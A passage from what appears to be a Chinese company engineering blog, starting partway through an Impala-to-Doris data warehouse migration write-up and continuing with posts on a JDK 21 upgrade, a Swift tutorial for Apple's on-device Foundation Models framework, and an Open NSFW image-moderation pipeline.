技术团队迅速展开排查，确认数据源写入正常，问题出现在计算环节。分钟级任务流程如下：

数据写入 → 元数据刷新(REFRESH) → 积分汇总查询


经过深入分析，发现问题根源在于Impala的元数据缓存机制与高频更新场景的不匹配。

技术原理分析

Impala采用内存缓存元数据策略提升查询性能，但这也带来了数据一致性问题：

1.元数据感知延迟：数据写入HDFS与Impala感知到数据更新是两个独立步骤 

2.REFRESH非原子性：元数据刷新存在"真空期" 

3.查询时序风险：查询恰好发生在元数据更新过程中时，会读取到不完整的数据视图  

问题发生场景模拟

时间线：
T0：缓存10个文件 → 查询结果100分 ✓  
T1：写入第11个文件，执行REFRESH  
T1.1：清除旧缓存（10个文件信息丢失）  
T1.2：查询抵达，只加载了部分元数据（如5个文件） → 查询结果50分 ✗（数据回滚）  
T2：REFRESH完成，缓存完整11个文件  
T3：下次查询 → 结果110分 ✓  


这种架构局限性在低频更新场景下不明显，但在分钟级更新频率下，问题暴露无遗。对于要求数据单调递增的积分类业务，这是无法接受的致命缺陷。

根本原因总结



三、方案：引入Apache Doris新一代实时数仓

3.1 技术选型决策

基于问题分析，技术团队明确了新架构的核心要求：

1.数据写入即可查询 

2.保证查询一致性 

3.支持高频实时更新 

4.易于运维和扩展 

经过多轮技术调研和对比测试，团队最终选择Apache Doris作为新一代实时数仓解决方案。

3.2 Doris架构优势

1.统一的元数据管理：彻底告别REFRESH 

与Impala+Hive的存算分离架构不同，Doris采用存算一体设计，元数据更新与数据操作原子性同步完成。数据一旦写入成功，立即可查，从根源上消除了元数据不一致的可能性。
2.MVCC机制保障查询一致性 

Doris通过多版本并发控制（MVCC）机制，为每个查询提供特定版本的数据快照。无论后台数据如何更新，查询看到的数据始终保持一致性，完美解决了"读半份数据"的问题。 

3.原生实时更新能力 

Doris的Unique Key模型原生支持基于主键的实时更新（UPSERT），大大简化了ETL流程。可以直接将增量数据写入Doris，由系统自动完成数据的合并和更新。 

4.存算分离架构优势 

Doris 3.x版本支持存算分离架构，将计算资源与存储资源解耦，带来多重优势： 

● 资源弹性伸缩：计算节点和存储节点可独立扩缩容
● 成本优化：存储层可使用成本更低的云对象存储
● 高可用性：数据多副本存储，计算节点无状态

3.3 集群部署规划

为满足业务高可用和高性能需求，我们设计了3FE+3BE的独立部署架构，采用存算分离模式：


集群节点规划

部署架构图

集群监控



四、效果：架构升级的显著收益

4.1 问题根治与性能提升



4.2 业务价值体现

1.用户体验提升：数据实时准确，用户信任度大幅提高 

2.运营效率优化：分钟级数据反馈，支持精细化运营 

3.开发成本降低：ETL逻辑简化，开发效率提升40% 

4.运维复杂度下降：去除了复杂的元数据协调机制 

5.成本效益提升：存算分离架构降低总拥有成本  

五、总结与展望

5.1 经验总结

这次架构迁移项目给我们带来了宝贵的技术启示：

1.技术选型需匹配场景：Impala+Hive适合离线分析，但不适合高频更新场景 

2.架构缺陷的隐蔽性：元数据一致性问题在低频场景下不易暴露 

3.平滑迁移的重要性：完善的验证机制是成功迁移的关键 

4.存算分离的价值：资源弹性与成本优化的双重收益  

5.2 技术架构优势对比



5.3 未来规划

基于此次成功经验，团队计划：

1.扩大应用范围：将更多实时业务场景迁移至Doris 

2.深度优化：利用Doris高级特性进一步优化性能 

3.架构标准化：形成实时数仓建设的最佳实践规范 

4.探索新特性：尝试向量化引擎、湖仓一体等新功能 

此次架构升级不仅是技术栈的变更，更是数据服务理念的升级。从"数据可用"到"数据实时可靠"，我们为业务创新奠定了坚实的数据基础。在快速变化的业务环境中，选择合适的技术架构，是支撑业务持续增长的关键保障。

作者介绍：


高泽坤  高级大数据开发工程师



JDK 21升级总结
微鲤技术团队 — Tue, 09 Dec 2025 06:58:43 GMT
一、背景

 

将公司的 Java 技术栈从 JDK 11 升级到 JDK 21，不仅仅是一次常规的版本更新，更是一次对生产力、系统性能、安全性和未来技术竞争力的战略投资。JDK 11 作为上一个长期支持版（LTS），稳定可靠，但自其发布以来，Java 平台经历了十个版本的迭代，积累了大量革命性的新特性和底层优化。JDK 21 作为最新的 LTS 版本，是这些创新的集大成者。

 

升级的必要性

 


支持终结
：Oracle 对 JDK 11 的免费公开更新（Public Updates）已于 2023 年 9 月结束。这意味着，如果不购买商业支持，你的生产环境将
无法获得最新的安全补丁和错误修复
，这对于任何暴露在网络环境下的应用来说都是一个严重的安全隐患。
框架和库的硬性要求
：主流的开源框架和库正在快速拥抱新的 JDK 版本。例如，
Spring Framework 6 和 Spring Boot 3.x 已经将最低版本要求提升至 JDK 17。这意味着，如果你的团队想使用这些框架的最新功能、性能优化和安全修复，升级 JDK 是一个无法绕过的前提条件。


二、JDK21版本特性

 

虚拟线程

 

虚拟线程 (Virtual Threads - Project Loom)
：这是 JDK 21 的
王牌特性**。它从根本上改变了 Java 的并发编程模型。


之前 (JDK 11)
：我们依赖昂贵的平台线程（与操作系统线程 1:1 对应），通过复杂的异步编程（如 CompletableFuture）和线程池来处理高并发，代码复杂且难以调试。
现在 (JDK 21)
：我们可以用极其轻量级的虚拟线程，以
同步、顺序的编码风格写出高并发程序
。一个 JVM 可以轻松创建数百万个虚拟线程，使 I/O 密集型应用的吞吐量得到
数量级的提升
，同时
显著降低了代码的复杂性
。


新一代垃圾收集器 (GC)

 


ZGC 和 Shenandoah 的成熟
：这两款低延迟 GC 在 JDK 21 中已成为生产可用级别，能够将 GC 暂停时间控制在
亚毫秒级别
，对于需要稳定低延迟的实时应用（如交易系统、实时推荐）至关重要。
G1 GC 的持续改进
：作为默认 GC，G1 在新版本中也获得了大量优化，吞吐量和延迟表现比 JDK 11 中更好。
新版本引入了大量语法糖和新特性，旨在消除冗长的“样板代码”，让代码更简洁、更安全、更具表达力。


 

语法糖和新特性

 

新版本引入了大量语法糖和新特性，旨在消除冗长的“样板代码”，让代码更简洁、更安全、更具表达力。


Records (记录类 - JDK 16)
：一句话定义不可变的数据载体类 (DTO/POJO)，自动生成构造函数、equals()、hashCode()、toString() 和 getter。


JDK 11

public final class Point {  
  private final int x;
  private final int y;
  // + 构造函数, getters, equals, hashCode, toString... (约50行代码)
}


JDK 21

public record Point(int x, int y) { } // 1行代码搞定  



Switch 模式匹配 (Pattern Matching for Switch - JDK 21)
：让 switch 语句变得前所未有的强大和安全，可以直接对对象的类型和属性进行判断，消除了繁琐的 if-else 和类型强转。


JDK 11

Object obj = ...;  
if (obj instanceof String) {  
  String s = (String) obj;
  System.out.println("String: " + s.toUpperCase());
} else if (obj instanceof Integer) {
  // ...
}


JDK 21

Object obj = ...;  
switch (obj) {  
  case String s -> System.out.println("String: " + s.toUpperCase());
  case Integer i -> System.out.println("Integer: " + i);
  default -> { }
}



文本块 (Text Blocks - JDK 15)
：优雅地编写多行字符串，告别丑陋的 + 拼接和 \n 转义，尤其适合编写 SQL、JSON、HTML 等。


JDK 11: 

String json = "{\n" + " \"name\": \"John\",\n" + " \"age\": 30\n" + "}";  


JDK 21:

String json = """  
  {
    "name": "John",
    "age": 30
  }
  """;


 

其他重要特性

 


Record 模式 (Record Patterns, JDK 21)：优雅地解构 Record 对象。
Sealed Classes (密封类, JDK 17)：更精确地控制类的继承关系，构建更严谨的领域模型。
var 关键字的改进：让局部变量类型推断更强大。
更友好的 NullPointerExceptions：NPE 异常信息会明确指出哪个变量是 null。


三、Spring Boot版本选择

 

SpringBoot和JDK版本兼容

 

Spring Boot Version JDK Version 来源
2.1 8 – 12 https://docs.spring.io/spring-boot/docs/2.1.x/reference/html/getting-started-system-requirements.html
2.2 – 2.3 8 – 15 https://docs.spring.io/spring-boot/docs/2.1.x/reference/html/getting-started-system-requirements.html
2.4 8 – 16 https://docs.spring.io/spring-boot/docs/2.4.x/reference/html/getting-started.html#getting-started-system-requirements
2.5 8 – 18 https://docs.spring.io/spring-boot/docs/2.5.x/reference/html/getting-started.html#getting-started.system-requirements
2.6 8 – 19 https://docs.spring.io/spring-boot/docs/2.6.x/reference/html/getting-started.html#getting-started.system-requirements
2.7 8 – 21 https://docs.spring.io/spring-boot/docs/2.7.x/reference/html/getting-started.html#getting-started.system-requirements
3.0 17 – 21 https://docs.spring.io/spring-boot/docs/3.0.x/reference/html/getting-started.html#getting-started.system-requirements
3.1 17 – 21 https://docs.spring.io/spring-boot/docs/3.1.x/reference/html/getting-started.html#getting-started.system-requirements
3.2 17 – 23 https://docs.spring.io/spring-boot/docs/3.2.x/reference/html/getting-started.html#getting-started.system-requirements  

虽然Spring Boot 3.x 版本带来了许多激动人心的新特性，但其颠覆性的 javax.到 jakarta.命名空间迁移为项目带来了不可忽视的巨大挑战。从 Spring Boot 2.x 升级到 3.x 不仅仅是一次常规的版本升级，而是一次
伤筋动骨的底层 API 迁移。

 

什么是命名空间变更？

 

由于 Java EE 规范的所有权从 Oracle 转移到了 Eclipse 基金会，其名称也变更为 Jakarta EE。这导致了所有相关 API 的 Java 包名从 javax.
 强制变更为 jakarta.
。例如：


javax.servlet.http.HttpServletRequest -> jakarta.servlet.http.HttpServletRequest
javax.persistence.Entity -> jakarta.persistence.Entity
javax.validation.constraints.NotNull -> jakarta.validation.constraints.NotNull


 

迁移成本巨大？

 

1、全局代码修改：这不仅仅是简单的“查找和替换”。项目中所有涉及到 Servlet API、JPA、Bean Validation 等规范的 import 语句都需要修改。对于一个成熟的大型项目，这涉及成百上千个文件的改动。 

2、整个依赖生态系统的颠覆：这是最棘手的问题。不仅仅是我们的代码，我们所依赖的所有第三方库（如数据库驱动、消息队列客户端、缓存工具、安全框架、自定义 Starters 等）都必须提供与 Jakarta EE 兼容的新版本。 

3、传递性依赖冲突：即使我们升级了直接依赖，这些依赖的传递性依赖（它们依赖的库）可能仍然停留在 javax 命名空间，这将导致灾难性的类路径冲突（ClassNotFoundException,NoClassDefFoundError），解决这些冲突非常耗时且痛苦。 

4、潜在的“深水区” Bug：某些库可能声称兼容 Jakarta EE，但在边缘场景下存在未被发现的 Bug。这种因底层 API 变更引入的问题通常难以定位和修复。

 

决策结论：

 

选择 Spring Boot 2.7.18 意味着我们可以
完全避免
这个高风险、高成本的迁移过程，将团队的宝贵时间和精力聚焦于业务功能的开发和交付上。

 

四、依赖库版本

 

依赖库版本可通过如下链接进行获取：
https://docs.spring.io/spring-boot/docs/2.7.18/reference/htmlsingle/#appendix.dependency-versions 

https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-parent/2.7.18

依赖 版本
org.springframework 5.3.31
spring-data-redis 2.7.18
spring-data-mongodb 3.4.18
commons-lang3 3.12.0
commons-collections 3.2.2
commons-collections4 4.4
jstl 1.2
guava 32.1.3-jre
jackson-mapper-asl 1.9.8
jackson-core 2.16.1
hibernate-validator 6.2.5.Final
javax.el 3.0.0
javax.validation 2.0.1.Final
javax.xml.bind 2.3.1
suishen.com.baidu.disconf 2.6.38-SNAPSHOT
org.reflections 0.9.11
lombok 1.18.30
org.jetbrains 24.0.1
suishen-libs 3.0.0-jdk21-SNAPSHOT
suishen-redis 3.0.0-jdk21-SNAPSHOT
suishen-webx-parent 3.0-jdk21-SNAPSHOT
suishen-webx-core 3.0-jdk21-SNAPSHOT
suishen-root-pom 3.0-jdk21-SNAPSHOT

五、升级步骤

开发工具准备：


idea升级到2025.2版本
maven使用3.6.1版本
tomcat 8或9


步骤1、pom文件修改

（1）升级suishen-webx-parent版本

    
        suishen-webx
        suishen-webx-parent
        3.0-jdk21-SNAPSHOT
    


（2）完成后确认项目中的其他依赖库版本：

步骤2、更改applicationContext-mongodb.xml配置

（1）原配置：spring-data-mongodb 1.10.15.RELEASE

!-- 定义mongo对象，对应的是mongodb官方jar包中的Mongo，replica-set设置集群副本的ip地址和端口，多个以英文逗号分割 -->
    
        
    

    


（2）更改后配置
：spring-data-mongodb 3.4.18

 
    
        
    

    
    
        
    

    
    
        
        
    


步骤3、修改相关代码

mongo排序

修改前：new Sort(Sort.Direction.DESC, "startTime")

修改后：Sort.by(Sort.Direction.DESC, "startTime")


reids指令

修改前：ZParams zParams = new ZParams().aggregate(ZParams.Aggregate.SUM).weightsByDouble(weightsDouble)

修改后：ZParams zParams = new ZParams().aggregate(ZParams.Aggregate.SUM).weights(weightsDouble)


步骤4、eone流水线配置更改

 

基础环境：tomcat9_jdk21

步骤5、发布观察日志


应用启动日志：检查是否有类加载错误、依赖冲突或配置问题
性能指标：监控 CPU、内存使用情况，观察 GC 日志，确认 ZGC/G1 运行正常
功能验证：全面回归测试核心业务功能，确保升级后功能正常
错误日志：密切关注应用错误日志，特别关注与 JDK 版本相关的异常
第三方服务调用：验证与外部服务（如数据库、Redis、消息队列等）的连接和交互是否正常


六、总结

本次 JDK 21 升级是一次重要的技术迭代，不仅解决了 JDK 11 安全支持终止的问题，更为团队带来了：


长期技术支持：JDK 21 作为最新的 LTS 版本，将获得至少 8 年的安全更新支持
性能提升：虚拟线程、新一代 GC 等特性将显著提升应用的并发处理能力和响应速度
代码质量：Records、模式匹配等现代语法特性让代码更简洁、更安全、更易维护
技术竞争力：为未来采用 Spring Boot 3.x 等新技术栈奠定基础


升级过程中虽然需要处理依赖版本调整和部分代码适配，但通过选择 Spring Boot 2.7.18，避免了 Jakarta EE 命名空间迁移的巨大成本，在获得 JDK 21 核心优势的同时，保持了升级路径的平稳可控。

建议在升级完成后，逐步探索和应用 JDK 21 的新特性（如虚拟线程），充分发挥新版本的技术优势，持续提升系统的性能和开发效率。

作者介绍：


孙景亮  资深服务端开发工程师



iOS 26 调用 Apple Intelligence 本地模型：Foundation Models 实践
微鲤技术团队 — Fri, 07 Nov 2025 05:48:04 GMT
概述

 

Apple Intelligence的Foundation Models框架是在 WWDC 2025 正式发布的重要API，它让开发者能够直接调用运行在本地设备上的Apple Intelligence本地模型。Apple Intelligence本地的模型是一个 3B 参数的小模型，能够在保证隐私安全的前提下执行一些相对简单的信息摘要，提取，分类等相对简单的文本处理任务。

核心特性

 


本地运行： 所有数据处理都在设备本地进行，保护用户隐私
离线可用 ：无需网络连接即可运行
Swift原生支持：完美集成Swift语言特性
多平台支持 ：支持iOS、iPadOS、macOS和visionOS


一、环境准备

 

系统要求

 

iOS 26 或更高版本 

Apple Intelligence 支持的设备 

设备必须在设置中打开Apple Intelligence

导入框架

import FoundationModels  


检查模型可用性

在创建会话之前，检查模型在当前设备和区域是否可用：

import FoundationModels

// 检查模型可用性
if SystemLanguageModel.default.availability == .available {  
    // 可以创建会话
    print("Foundation Models 可用")
} else {
    // 处理不可用情况
    print("Foundation Models 不可用")
}

// 检查模型支持的语言
let supportedLanguages = SystemLanguageModel.default.supportedLanguages  
guard supportedLanguages.contains(Locale.current.language) else {  
    // Show message
    return
}


二、基础使用

 

最简单的调用方式

 

使用 LanguageModelSession 初始化一个 session 并调用模型即可，同时初始化 session 时可以指定一些指令，使得模型能更准确的响应你的问题：

import FoundationModels  
import Playgrounds

func respond(userInput: String) async throws -> String {  
    let session = LanguageModelSession(instructions: """
    You are a professional tour guide.
    Respond to the tourist’s question.
    """
    )
    do {
            let response = try await session.respond(to: userInput)
            return response.content
    } catch LanguageModelSession.GenerationError.exceededContextWindowSize {
             // New session, with some history from the previous session.
        }
}


会话一次只能处理一个请求，如果在前一个请求完成之前再次调用它，则会导致运行时错误。检查 isResponding 在发送新请求之前验证会话是否完成了前一个请求的处理。

context window size上下文窗口大小限制了模型可以为会话实例处理多少数据，系统模型最多支持4096个Token。不同语言一个Token对应不同数的字符，例如中文一个Token对应一个字符。在单个会话中，指令、所有提示和所有输出中所有令牌的总和计入上下文窗口大小。 

如果你的会话处理了大量超过上下文窗口的token，框架会抛出错误LanguageModelSession.GenerationError.exceededContextWindowSize（_:）。当您遇到错误时，请启动一个新的会话并尝试缩短提示。如果您需要处理单个上下文窗口限制无法容纳的大量数据，请将数据分成更小的块，在单独的会话中处理每个块，然后组合结果。另外，可以根据上一个会话的历史摘要，生成新的会话，保持会话上下文的连贯性。

其他 GenerationError 错误类型：

// 表示会话所需的资产不可用的错误
case assetsUnavailable(LanguageModelSession.GenerationError.Context)  
// 表示会话未能从模型输出反序列化有效的可生成类型的错误
case decodingFailure(LanguageModelSession.GenerationError.Context)  
// 表示会话已达到其上下文窗口大小限制的错误
case exceededContextWindowSize(LanguageModelSession.GenerationError.Context)  
// 表明系统的安全护栏是由提示中的内容或模型生成的响应触发的
case guardrailViolation(LanguageModelSession.GenerationError.Context)  
// 表明您的会话已受到速率限制
case rateLimited(LanguageModelSession.GenerationError.Context)  
// 会话拒绝请求时发生的错误
case refusal(LanguageModelSession.GenerationError.Refusal, LanguageModelSession.GenerationError.Context)  
// 如果您试图使会话响应第二个提示，而它仍在响应第一个提示，则会发生错误
case concurrentRequests(LanguageModelSession.GenerationError.Context)  
// 使用了具有不受支持模式的生成指南
case unsupportedGuide(LanguageModelSession.GenerationError.Context)  
// 发生错误的上下文
struct Context  
// 语言模型产生的拒绝
struct Refusal  


 

为了获得最佳的提示结果，可尝试不同的生成选项，影响模型的运行时参数：GenerationOptions

// init(sampling: GenerationOptions.SamplingMode?, temperature: Double?, maximumResponseTokens: Int?)
// sampling：模型在生成响应时选择令牌的抽样策略，SamplingMode 一种定义如何从概率分布中采样值的类型
// temperature：影响模型响应的置信度
// maximumResponseTokens：模型在其响应中允许产生的令牌的最大数量
let options = GenerationOptions(temperature: 2.0)

let session = LanguageModelSession()

let prompt = "Write me a story about coffee."  
let response = try await session.respond(  
    to: prompt,
    options: options
)


三、格式化输出(Guided Generation)

 

Foundation Models 框架的一个重要特性是能够确保模型输出特定格式的数据，而不是依赖不可靠的提示词。  

 

定义输出格式

 

使用 @Generable 和 @Guide 宏来定义输出结构：

import FoundationModels

@Generable
struct SearchSuggestions {  
    @Guide("搜索建议的景点名称")
    let name: String

    @Guide(description: "相关的搜索关键词列表 限制4个", .count(4))
    let keywords: [String]

    @Guide("搜索的分类，如：人文、自然、娱乐等")
    let category: String

    @Guide("建议的优先级，1-10的数字")
    let priority: Int
}


上面的代码中 @Generable 来修饰 SearchSuggestions 这个 struct 表示它是语言模型的一个输出格式类， 然后 @Guide 可以为每个属性做说明和格式限制。

然后在使用 session 调用模型的时候，把 SearchSuggestions 传进去即可：

 let prompt = """
    Generate a list of suggested search terms for an app about visiting famous landmarks.
    """

let response = try await session.respond(  
    to: prompt,
    generating: SearchSuggestions.self
)
let suggestions = response.content  
print("名称: \(suggestions.name)")  
print("关键词: \(suggestions.keywords.joined(separator: ", "))")  
print("分类: \(suggestions.category)")  
print("优先级: \(suggestions.priority)")  


模型输出的内容就直接是我们这个自定义的类 SearchSuggestions 了。

 

四、流式输出 (Streaming)

 

对于结构化的数据格式输出，比如JSON，一个个Token的输出，会产生语法解析问题。因此，我们当然是期望流式输出是按照一个 JSON 语法单位的形式生成，而且对于长时间的生成任务，使用流式输出可以提供更好的用户体验。

// 为指定类型开启流式响应
let stream = session.streamResponse(  
    to: "prompt",
    generating: SearchSuggestions.self
)

for try await suggestions in stream {  
    print(suggestions)
}


五、工具调用 (Tool Calling)

 

Foundation Models 支持工具调用功能，让模型能够调用应用程序的特定功能。我们把应用自身的一些功能函数告诉本地模型，由它来决定是否调用，以及什么时候调用。  

 

定义工具

 

import CoreLocation  
import WeatherKit

// 天气查询工具
struct GetWeatherTool: Tool {  
    let name = "GetWeather"
    let description = "获取指定城市的当前天气信息"

    @Generable
    struct Arguments {
        @Guide("要查询天气的城市名称")
        let city: String
    }

    func call(with arguments: Arguments) async throws -> ToolOutput {
        // 使用Core Location将城市名转换为坐标
        let geocoder = CLGeocoder()
        let placemarks = try await geocoder.geocodeAddressString(arguments.city)

        guard let location = placemarks.first?.location else {
            return "无法找到城市：\(arguments.city)"
        }

        // 使用WeatherKit获取天气信息
        let weather = try await WeatherService.shared.weather(for: location)

        let temperature = weather.currentWeather.temperature.value
        let condition = weather.currentWeather.condition.description

        return ToolOutput("\(arguments.city)当前天气：\(condition)，温度：\(Int(temperature))°C")
    }
}

// 日历事件工具
struct CreateCalendarEventTool: Tool {  
    let name = "CreateCalendarEvent"
    let description = "创建新的日历事件"

    @Generable
    struct Arguments {
        @Guide("事件标题")
        let title: String

        @Guide("事件日期，格式：YYYY-MM-DD")
        let date: String

        @Guide("事件时间，格式：HH:MM")
        let time: String

        @Guide("事件描述（可选）")
        let description: String?
    }

    func call(with arguments: Arguments) async throws -> ToolOutput {
        // 这里实现创建日历事件的逻辑
        // 实际应用中需要使用EventKit框架

        return ToolOutput("已创建事件：\(arguments.title)，时间：\(arguments.date) \(arguments.time)")
    }
}


上面代码创建了一个 GetWeatherTool和CreateCalendarEventTool， 其中GetWeatherTool用于获取指定城市的天气情况，CreateCalendarEventTool用于创建日历事件。 自定义工具需要继承Tool protocol。 其中有name和description属性， 用于给本地模型提供这个工具的名称，以及作用描述。 本地模型根据这个信息来确定它的功能，以及什么时候调用它。
Arguments用于定义这个Tool接收的所有参数，比如GetWeatherTool这里定义了一个city， 并且用@Guide标记了这个参数的说明，这样本地的语言模型就知道如何创建这个参数了。 

接下来的call方法就是这个Tool的具体实现，通过给定的城市名称，调用CLGeocoder去解析成地理位置，然后调用苹果的WeatherService去获取天气信息并且返回。
现在Tool 创建好了，再来看看如何把它应用到模型中：

 

使用工具

 

class ToolEnabledService {  
    private var session: LanguageModelSession?

    func initializeSession() async throws {
        // 创建包含工具的会话
        session = try await LanguageModelSession(
            tools: [GetWeatherTool(), CreateCalendarEventTool()],
            instructions: """
            你是一个智能助手，可以帮助用户查询天气和创建日历事件。
            当用户询问天气时，使用GetWeather工具。
            当用户要创建提醒或安排日程时，使用CreateCalendarEvent工具。
            """
        )
    }

    func handleUserRequest(_ request: String) async throws -> String {
        guard let session = session else {
            throw AIError.sessionNotInitialized
        }

        let response = try await session.response(to: request)
        return response.content
    }
}

// 使用示例
let toolService = ToolEnabledService()  
try await toolService.initializeSession()

// 查询天气
let weatherResponse = try await toolService.handleUserRequest("北京今天天气怎么样？")  
print(weatherResponse)

// 创建事件
let eventResponse = try await toolService.handleUserRequest("帮我在明天下午3点创建一个会议提醒")  
print(eventResponse)  


六、会话上下文记忆

 

上下文保持

 

在同一个 LanguageModelSession 中会自动保持对话的上下文：

class ContextAwareService {  
    private var session: LanguageModelSession?

    func initializeSession() async throws {
        session = try await LanguageModelSession()
    }

    func continuousChat() async throws {
        guard let session = session else {
            throw AIError.sessionNotInitialized
        }

        // 第一轮对话
        let response1 = try await session.response(to: "请写一首关于鱼的俳句")
        print("AI: \(response1.content)")

        // 第二轮对话 - 模型会记住上下文
        let response2 = try await session.response(to: "现在写一首关于高尔夫的")
        print("AI: \(response2.content)") // 模型知道用户想要另一首俳句

        // 查看完整对话历史
        print("\n=== 对话历史 ===")
        for message in session.transcript {
            print("\(message.role): \(message.content)")
        }
    }
}


以上代码，由于模型会记住上下文，在第二轮对话的提示词中只说了关于高尔夫的，模型也知道提示词的隐含意思是要写一手关于高尔夫的俳句。

其中 session 还提供了一个 transcript 属性，通过它就能看到当前上下文中所有的信息。

 

七、专用适配器(Use Case Adapters)

 

Foundation Models 提供了针对特定用例优化的适配器：

内容标签适配器

 

class ContentTaggingService {  
    private var session: LanguageModelSession?

    func initializeSession() async throws {
        // 使用内容标签适配器
        let model = SystemLanguageModel(useCase: .contentTagging)
        session = try await LanguageModelSession(model: model)
    }

    func tagContent(_ content: String) async throws -> [String] {
        guard let session = session else {
            throw AIError.sessionNotInitialized
        }

        let prompt = "为以下内容生成标签：\(content)"
        let response = try await session.response(to: prompt)

        // 解析标签
        return response.content.components(separatedBy: ",").map { $0.trimmingCharacters(in: .whitespaces) }
    }

    func extractEntities(from text: String) async throws -> [String] {
        guard let session = session else {
            throw AIError.sessionNotInitialized
        }

        let prompt = "从以下文本中提取实体：\(text)"
        let response = try await session.response(to: prompt)

        return response.content.components(separatedBy: "\n").filter { !$0.isEmpty }
    }
}


八、实际应用案例

 

智能笔记应用

 

import FoundationModels

class IntelligentNotesApp {  
    private var session: LanguageModelSession?

    init() {
        Task {
            try await initializeAI()
        }
    }

    private func initializeAI() async throws {
        session = try await LanguageModelSession(
            tools: [SummarizeNotesTool(), ExtractKeywordsTool()],
            instructions: "你是一个智能笔记助手，可以帮助用户整理和分析笔记内容。"
        )
    }

    // 笔记摘要功能
    func summarizeNote(_ content: String) async throws -> String {
        guard let session = session else { 
          throw AIServiceError.sessionNotInitialized 
        }

        let prompt = "请为以下笔记生成简洁的摘要：\(content)"
        let response = try await session.response(to: prompt)
        return response.content
    }

    // 关键词提取
    func extractKeywords(from content: String) async throws -> [String] {
        guard let session = session else { throw AIServiceError.sessionNotInitialized }

        let prompt = "从以下内容中提取关键词：\(content)"
        let response = try await session.response(to: prompt)

        return response.content.components(separatedBy: ",")
            .map { $0.trimmingCharacters(in: .whitespaces) }
    }

    // 智能分类
    @Generable
    struct NoteCategory {
        @Guide("笔记的主要分类")
        let primaryCategory: String

        @Guide("次要分类标签")
        let tags: [String]

        @Guide("重要程度评分 1-10")
        let importance: Int
    }

    func categorizeNote(_ content: String) async throws -> NoteCategory {
        guard let session = session else { throw AIServiceError.sessionNotInitialized }

        let prompt = "请分析以下笔记内容并进行分类：\(content)"
        return try await session.response(to: prompt, generating: NoteCategory.self)
    }
}


智能客服助手

class CustomerServiceBot {  
    private var session: LanguageModelSession?

    init() {
        Task {
            try await setupBot()
        }
    }

    private func setupBot() async throws {
        session = try await LanguageModelSession(
            tools: [OrderLookupTool(), RefundProcessTool(), FAQSearchTool()],
            instructions: """
            你是一个专业的客服助手。你需要：
            1. 礼貌和耐心地回应客户问题
            2. 使用工具查找订单信息和处理退款
            3. 如果无法解决问题，建议联系人工客服
            """
        )
    }

    @Generable
    struct CustomerIntent {
        @Guide("客户意图分类：咨询、投诉、退款、查询订单等")
        let intent: String

        @Guide("情绪状态：满意、中性、不满、愤怒")
        let sentiment: String

        @Guide("优先级：低、中、高、紧急")
        let priority: String

        @Guide("是否需要人工介入")
        let needsHumanAgent: Bool
    }

    func analyzeCustomerMessage(_ message: String) async throws -> CustomerIntent {
        guard let session = session else { 
          throw AIServiceError.sessionNotInitialized 
        }

        let prompt = "分析以下客户消息：\(message)"
        return try await session.response(to: prompt, generating: CustomerIntent.self)
    }

    func respondToCustomer(_ message: String) async throws -> String {
        guard let session = session else { 
          throw AIServiceError.sessionNotInitialized 
        }

        let response = try await session.response(to: message)
        return response.content
    }
}


结语

 

Foundation Models 框架为iOS开发者提供了强大的本地AI能力，使得在保护用户隐私的同时能够构建智能应用成为可能。通过合理使用这个框架，可以为用户提供更加个性化和智能的体验。

随着Apple Intelligence生态的不断发展，Foundation Models框架将成为iOS应用开发中不可或缺的重要工具。建议深入学习和实践这个框架，创造更好的智能应用体验。

作者介绍：

 


刘爽    高级IOS开发工程师



基于OPEN NSFW的UGC图⽚合规治理体系设计与实践
微鲤技术团队 — Fri, 07 Nov 2025 05:43:04 GMT
一、业务背景

 

某业务的UGC（⽤户⽣成内容）平台中，⽬前历史图⽚没有过内容安全，历史海量数据（1亿+规模）存在隐性违规⻛险。当⽤户访问时，会被检测到，导致域名被封⻛险。因此需要对历史图⽚进⾏扫描，删除违规图⽚。

⽬前有两种⽅案：


使⽤云端商业API。
构建本地化内容安全检测体系。


云端商业API⽅案存在域名封禁⻛险且经济成本过⾼（按量计费模式预估成本超20万元/亿张）。因此本⽅案通过构建本地化内容安全检测体系，实现合规治理与⻛险控制的平衡。

二、Open NSFW解析

 

Open NSFW基于ResNet-50架构，使⽤Caffe框架训练，输⼊为224x224的RGB图像，输出0（安全）到1（不适宜）的概率值。

模型特性：



优势：


轻量化：模型⼤⼩仅约90MB，推理速度在GPU上可达50ms/张
场景适配：针对⽹络图⽚优化，对模糊、低分辨率图⽚有⼀定鲁棒性
开源透明：允许开发者⾃⾏调整阈值（默认0.8）和⼆次训练


局限性：


不⽀持视频流实时分析
不能识别⽂字


三、⽅案实施

 

⼯程化改进：

 


框架迁移：

将Caffe模型转换为TensorFlow SavedModel格式，实现跨平台部署能⼒，原始Caffe模型：https://github.com/yahoo/open_nsfw
预处理优化：

采用双线性插值，提升低质量图像识别准确率


/ --------------------- 图像预处理计算图构建 ---------------------
    // 步骤1: 解码JPEG图像（原始字节 -> UINT8张量）
    // decodeJpeg输出形状 [height, width, channels], channels=3(RGB)
    Output decodedImage = b.decodeJpeg(
        b.constant("input_jpg_bytes", imageBytes),  // 输入JPEG字节流
        3  // 指定输出通道数为3(RGB)
    );

    // 步骤2: 类型转换（UINT8 -> FLOAT，便于后续数值计算）
    Output floatImage = b.cast(decodedImage, Float.class);

    // 步骤3: 添加批次维度（模型需要batch维度，即使只有一个图像）
    // expandDims在第0维插入，形状变为 [1, height, width, 3]
    Output batchedImage = b.expandDims(
        floatImage,
        b.constant("batch_dim", 0)  // 在维度0添加批次
    );

    // 步骤4: 双线性插值调整图像尺寸至224x224
    // resizeBilinear输出形状 [1, H, W, 3]
    Output resizedImage = b.resizeBilinear(
        batchedImage,
        b.constant("target_size", new int[]{H, W})  // 目标尺寸[H,W]顺序
    );

    // 步骤5: 数据归一化（减去训练集均值）
    // sub操作广播mean值到所有像素: (resizedImage - mean)
    Output meanCentered = b.sub(
        resizedImage,
        b.constant("mean_value", mean)
    );

    // 步骤6: 缩放数据（若训练时使用scale，此处可调整数值范围）
    // div操作广播scale值: (meanCentered / scale)
    Output normalizedOutput = b.div(
        meanCentered,
        b.constant("scale_factor", scale)
    );



服务化：构建微服务，docker部署，支持k8s动态扩缩容，提高QPS


上线后效果

 


对全量数据进⾏扫描（1亿+规模），对违规图⽚进⾏了删除
定时对增量图⽚进⾏扫描，满⾜了合规需求


四、后续升级

 

1、多模态融合检测：

 


视觉增强：集成YOLOv11实现敏感部位定位（ROI聚焦检测）
⽂本识别：采⽤PaddleOCR提取图⽚内⽂字，构建敏感词库正则匹配
对抗样本防御：部署PGD对抗训练模型，抵御98%的⾊情图⽚变体


